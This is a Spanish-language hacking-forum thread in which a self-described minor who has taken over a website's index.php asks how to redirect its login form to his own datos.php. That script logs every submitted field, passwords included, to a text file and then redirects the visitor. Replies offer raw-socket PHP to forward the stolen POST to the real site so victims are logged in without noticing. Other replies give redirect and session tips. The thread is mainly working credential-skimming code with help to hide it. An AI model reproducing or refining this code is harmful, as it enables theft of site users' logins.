Imprimir Página - duda sobre pishing.php

Título: duda sobre pishing.php
Publicado por: .:UND3R:. en 4 Marzo 2010, 19:11 pm

Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

Código:

<?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web :-(
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias

Título: Re: duda sobre pishing.php
Publicado por: дٳ⁪⁪⁪⁪⁪⁪⁪Ŧ٭ en 4 Marzo 2010, 19:47 pm

Pon esto al final:

header ('Location: http://www.web.com/ ');

Título: Re: duda sobre pishing.php
Publicado por: .:UND3R:. en 4 Marzo 2010, 20:46 pm

No lo logre :/ me redirecciona a la pagina pero no logueado
este es una parte del form de la pagina
<form action='' method='post' name='login_account' id='login_account'>

se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias :)

Título: Re: duda sobre pishing.php
Publicado por: luiggy2 en 4 Marzo 2010, 20:54 pm

Si, mirate este código para enviar datos por post a otra web:

Código

<?
 
	$host="www.tupagina.com";
	$referer="http://referer.com";
	$uri="/pagina.php";
	$vars="&parametro1=valor1&parametro2=valor2";
 
	$header = "Host: $host\r\n";
	$header .= "User-Agent: Mosaic\r\n";
	$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$header.="Referer: $referer\r\n";
	$header .= "Content-Length: ".strlen($vars)."\r\n";
	$header.="Pragma: no-cache\r\n";
	$header .= "Connection: close\r\n\r\n";
 
	$fp = pfsockopen("tcp://".$host, 80, $errno, $errstr, 20);
	fputs($fp, "POST $uri HTTP/1.1\r\n");
	fputs($fp, $header.$vars);
	while (!feof($fp)){
		echo fgets($fp, 128)."<br>";
	}
	fclose($fp);
?>

fuente:http://pastebin.com/f7f667268

Saludos!

Título: Re: duda sobre pishing.php
Publicado por: .:UND3R:. en 4 Marzo 2010, 21:11 pm

:B soy un poco nulo con esto de php osea el codigo que me mandaste
en el index ¿lo pongo asi?

<form method="post" ACTION=codigo.php

y en el codigo.php pongo el codigo que me enviaste
_____________________________________0

Código:

$referer="http://referer.com";
	$uri="/pagina.php";

esta es la ruta de la pagina web original?

en que lugar de mi pagina queda guardado los datos?

muchas gracias por tu ayuda

Título: Re: duda sobre pishing.php
Publicado por: Shell Root en 4 Marzo 2010, 21:24 pm

Sabes programar, PHP?

Título: Re: duda sobre pishing.php
Publicado por: .:UND3R:. en 4 Marzo 2010, 21:46 pm

no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda :rolleyes:

hice esto:

Código:

<?php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
header ('Location: http://fantazymu.web.id/index.php/ ');
exit;
?>

pero todavia no logro entrar como autentificado

el form de la pagina es este:

Código:

                  <form action='' method='post' name='login_account' id='login_account'>
                          <table width='166' border='0' cellspacing='0' cellpadding='0'>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td>
                            </tr>
                            <tr>
                              <th height='16' colspan='2' scope='row'><div align='left'>
                                  <input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>

                                  <input name='account_login' type='hidden' id='account_login' value='account_login'>
                              </div></th>
                            </tr>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td>
                            </tr>
                            <tr>
                              <th colspan='2' scope='row'><div align='left'>

                                  <input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'>
                              </div></th>
                            </tr>
                            <tr>
                              <th width='62' height='33' scope='row'><div align='left'>
                                  <input name='Submit' type='submit' class='button' value='Login!' title='Login'>
                              </div></th>
                              <td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>

                            </tr>
                          </table>
                        </form>

lo que ago es cambiar

Código:

<form action='' method='post' name='login_account' id='login_account'>

por esto

Código:

<FORM METHOD="post" ACTION="datos.php">

claro guarda los datos pero al momento de redireccionar al index no esta autentificada

Título: Re: duda sobre pishing.php
Publicado por: Nakp en 4 Marzo 2010, 22:01 pm

:¬¬

usa sesiones... te paso un manualito util :P

http://www.desarrolloweb.com/articulos/235.php

Título: Re: duda sobre pishing.php
Publicado por: WHK en 5 Marzo 2010, 08:46 am

no puedes hacer eso, tienes que autentificar sesiones con las cookies, enviar y recibir headers o hacer un bouncer.

Foro de elhacker.net

Programación => PHP => Mensaje iniciado por: .:UND3R:. en 4 Marzo 2010, 19:11 pm